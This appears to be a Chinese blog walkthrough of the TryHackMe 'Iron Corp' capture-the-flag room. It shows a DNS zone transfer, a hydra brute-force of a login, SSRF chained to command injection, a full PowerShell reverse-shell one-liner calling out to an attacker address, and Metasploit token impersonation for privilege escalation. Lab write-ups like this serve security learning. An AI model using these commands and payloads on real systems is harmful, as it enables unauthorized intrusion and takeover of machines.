noone___'s blog
0%

THM打靶日寄54-Iron Corp

发表于 更新于 分类于

  • 扫描打点

    • 8080

      一个控制台:

      有登录口,重置密码不能用

    • 11025

      仍然没什么东西

  • 子域名

    本来想用 wfuzz 来做,但太慢了,看wp学到用 dig ,直接秒出了

    1
    dig @10.10.171.13 ironcorp.me axfr

    之后回来补充一下,仅在 $53$ 端口开放时可以使用dig

    • internal

      看起来不在内网访问不到的样子

    • admin

      同样是在 11025 端口找到了登录入口:

      hydra 爆一下:

      1
      hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 11025 admin.ironcorp.me http-get

      账密 admin:password123

      进去后有个搜索,试了下不是文件包含,但能 ssrf

      借助这个可以访问到刚刚访问不到的 internal

      试试rce,发现后接分号会导致命令完整的输回来,后接 & 会自动忽略其之后的部分,后接 | 时有命令执行

      试图 nc 反弹 shell

      虽然但是,拿了个邮箱:mailto:webmaster@ironcorp.me

      应该拦了一部分,最后用靶机浏览器里面那个 reverse shell generator 生成的 powershell 连上了

      1
      powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ip',port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

      注意传的时候要过两遍 url 编码来避免空格的影响

      桌面找到第一个flag

  • Windows /priv 提权

    找到

    转移到msf里,用 incognito 伪造管理员令牌:

    1
    2
    3
    use incognito
    list_tokens -u
    impersonate_token "WIN-8VMBKF3G815/Admin"

    提为 admin